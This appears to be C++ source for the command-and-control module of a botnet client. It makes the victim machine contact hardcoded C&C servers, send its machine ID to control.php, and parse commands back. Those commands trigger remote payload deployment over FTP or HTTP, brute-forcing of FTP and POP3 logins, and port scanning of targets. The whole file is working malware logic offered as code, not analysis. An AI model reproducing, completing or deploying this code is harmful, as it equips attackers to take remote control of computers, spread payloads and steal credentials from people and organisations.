Control.H.#ifndef CONTROL_H#define CONTROL_H#include "includes.h"c

1. Control.H.
2.  
3. #ifndef CONTROL_H
4. #define CONTROL_H
5.  
6. #include "includes.h"
7.  
8. class ControlProcClass: public ThreadClass
9. {
10.  
11. public:
12.  
13. ControlProcClass();
14. ~ControlProcClass();
15.  
16. void run();
17. int ConnectToServer(string hostname, int port);
18. int ConnectToServers();
19. int GetCommands();
20. int ResolveCommands();
21. int ExecuteCommands();
22. int returnSock();
23.  
24. string Received;
25.  
26. private:
27.  
28. vector <string> hostnames;
29. vector <int> ports;
30.  
31. DebugLog * Log;
32.  
33. string Hostname;
34. int port;
35.  
36. SOCKET sock;
37.  
38. vector<string> commands;
39.  
40. int nHostnames;
41.  
42. };
43.  
44. #endif
45.  
46. ==================================================
47. Control.cpp
48. #include "includes.h"
49.  
50.  
51. ControlProcClass::ControlProcClass()
52. {
53. Log = DebugLog::initialize();
54. Log->writeLog(400, __LINE__, __FILE__, "Creating CommandProcClass");
55. string buffer;
56. vector <string> tokens;
57. buffer = CNC_SERVER_HOSTNAMES;
58. SplitString(buffer, hostnames, ",");
59. buffer = CNC_SERVER_PORTS;
60. SplitString(buffer, tokens, ",");
61. for (int i = 0; i != tokens.size(); i++)
62. {
63. ports.push_back(atoi(tokens[i].c_str()));
64. }
65. Log->writeLog(400, __LINE__, __FILE__, "Set Control Variables");
66. }
67.  
68. ControlProcClass::~ControlProcClass()
69. {
70. Log->writeLog(400, __LINE__, __FILE__, "Destroying ControlClass");
71. }
72.  
73. int ControlProcClass::returnSock()
74. {
75. ConnectToServers();
76. return sock;
77. }
78.  
79. void ControlProcClass::run()
80. {
81. Log = DebugLog::initialize();
82. Log->writeLog(400, __LINE__, __FILE__, "Starting command collection routine");
83. Log->writeLog(400, __LINE__, __FILE__, "Connecting to Command Servers");
84.  
85. if ((ConnectToServers()) == 1)
86. {
87.  
88. }
89.  
90. GetCommands();
91.  
92. ResolveCommands();
93.  
94. ExecuteCommands();
95.  
96. Log->writeLog(400, __LINE__, __FILE__, "Command collection routing completed");
97.  
98. }
99.  
100. int ControlProcClass::ConnectToServers()
101. {
102.  
103. int result = 2;
104. for (int i = 0; i != hostnames.size(); i++)
105. {
106.  
107. result = ConnectToServer(hostnames[i], ports[i]);
108. Hostname = hostnames[i];
109. port = ports[i];
110. if (result != 2)
111. {
112. break;
113. }
114. Log->writeLog(400, __LINE__, __FILE__,"Attempting connection to server - " + Hostname + "on TCP port " + IntToString(port));
115. }
116. Log->writeLog(400, __LINE__, __FILE__,"Connected to Command Server - " + Hostname + "on TCP port " + IntToString(port));
117. return 0;
118.  
119. }
120.  
121. int ControlProcClass::ConnectToServer(string hostname, int port)
122. {
123.  
124. int error;
125. string buffer;
126. struct sockaddr_in sin;
127. sock = socket(AF_INET, SOCK_STREAM, 0);
128. if (sock == INVALID_SOCKET)
129. {
130. error = GetLastError();
131. buffer = "Socket Function, WSAError: " + IntToString(error);
132. Log->writeLog(200, __LINE__, __FILE__, buffer);
133. return 2;
134. }
135. memset( &sin, 0, sizeof(sin) );
136. sin.sin_addr.s_addr = GetHostname(hostname);
137. sin.sin_family = AF_INET;
138. sin.sin_port = htons(port);
139. if (connect(sock, (sockaddr*)&sin, sizeof(sin)) == SOCKET_ERROR)
140. {
141. error = GetLastError();
142. buffer = "Connect Function, WSAError: " + IntToString(error);
143. Log->writeLog(200, __LINE__, __FILE__, buffer);
144. return 2;
145. }
146. if (sock == INVALID_SOCKET)
147. {
148. error = GetLastError();
149. buffer = "INVALID_SOCKET error, WSAError: " + IntToString(error);
150. Log->writeLog(200, __LINE__, __FILE__, buffer);
151. return 2;
152. }
153. /* string Request = "GET /control.php?id=1 HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
154. send(sock, Request.c_str(), Request.size(), 0);
155. char recvbuffer[4024];
156. recv(sock, recvbuffer, 4024, 0);
157. Received = recvbuffer;
158. vector<string> tokens;
159. SplitString(Received, tokens, "\n");
160. if (tokens[0].find("HTTP/1.1 404 Not Found") != string.npos)
161. {
162. Log->writeLog(200, __LINE__, __FILE__, "404 Error");
163. return 2;
164. }*/
165. return 0;
166. }
167.  
168. int ControlProcClass::GetCommands()
169. {
170.  
171. string MachineID = ReturnMachineID();
172. string Request = "GET /control.php?id="+MachineID+" HTTP/1.1\r\nHost:"+Hostname+" \r\nUser-Agent:Mozilla/4.0\r\n\r\n";
173. send(sock, Request.c_str(), Request.size(), 0);
174. char buffer[4024];
175. recv(sock, buffer, 4024, 0);
176. Received = buffer;
177. return 0;
178.  
179. }
180.  
181. int ControlProcClass::ResolveCommands()
182. {
183.  
184. Log->writeLog(400, __LINE__, __FILE__, "Splitting command string into an array");
185. vector<string> tokens;
186. SplitString(Received, tokens, "\n");
187. int nCommands = 0;
188. int sCommands = 0;
189. for (int i = 0; i < tokens.size(); i++)
190. {
191. if (tokens[i].find("END") != string::npos)
192. {
193. sCommands = 0;
194. }
195. else if (sCommands == 1)
196. {
197. nCommands++;
198. commands.push_back(tokens[i]);
199. Log->writeLog(400, __LINE__, __FILE__, "Found Command "+tokens[i]);
200. }
201. else if (tokens[i].find("START") != string::npos)
202. {
203. sCommands = 1;
204. }
205. }
206. Log->writeLog(400, __LINE__, __FILE__, "Received "+IntToString(nCommands)+" commands from control server");
207. return 0;
208.  
209. }
210.  
211. int ControlProcClass::ExecuteCommands()
212. {
213.  
214. vector<string> tokens;
215. for (int i = 0; i != commands.size(); i++)
216. {
217. SplitString(commands[i], tokens, ";");
218. //
219. // "DEPLOY via FTP" command
220. //
221. Log->writeLog(400, __LINE__, __FILE__, "Tokens: "+tokens[0]);
222. if (tokens[0].find("111") != string::npos)
223. {
224. string hostname = tokens[1];
225. string filename = tokens[2];
226. string username = tokens[3];
227. string password = tokens[4];
228. DeployClass DeployFTP;
229. DeployFTP.setFTP(hostname, 21, username, password, filename);
230. DeployFTP.Start("DEPLOY_FTP");
231. }
232. //
233. // "DEPLOY via HTTP" command
234. //
235. if (tokens[0].find("112") != string::npos)
236. {
237. string url = tokens[1];
238. DeployClass DeployHTTP;
239. DeployHTTP.setHTTP(url);
240. DeployHTTP.Start("DEPLOY_HTTP");
241. }
242. // "BRUTE" command
243. if (tokens[0].find("201") != string::npos)
244. {
245. string hostname = tokens[1];
246. string usernames = tokens[2];
247. string passwords = tokens[3];
248. string protocol = tokens[4];
249. BruteClass Brute;
250. Brute.setIPAddress(hostname);
251. if (protocol.find("21") != string::npos)
252. {
253. Brute.setProtocol(21);
254. }
255. else if (protocol.find("110") != string::npos)
256. {
257. Brute.setProtocol(110);
258. }
259. Brute.setUserPass(atoi(usernames.c_str()), atoi(passwords.c_str()));
260. Brute.Start("BRUTE");
261. }
262. // "SCAN" command
263. if (tokens[0].find("202") != string::npos)
264. {
265. string ipaddress = tokens[1];
266. vector <string> tokenss;
267. SplitString(ipaddress, tokenss, ";");
268. ipaddress = tokenss[0];
269. PortsClass Ports;
270. Ports.setIPAddress(ipaddress);
271. Ports.Start("SCAN");
272. }
273. }
274. return 0;
275. }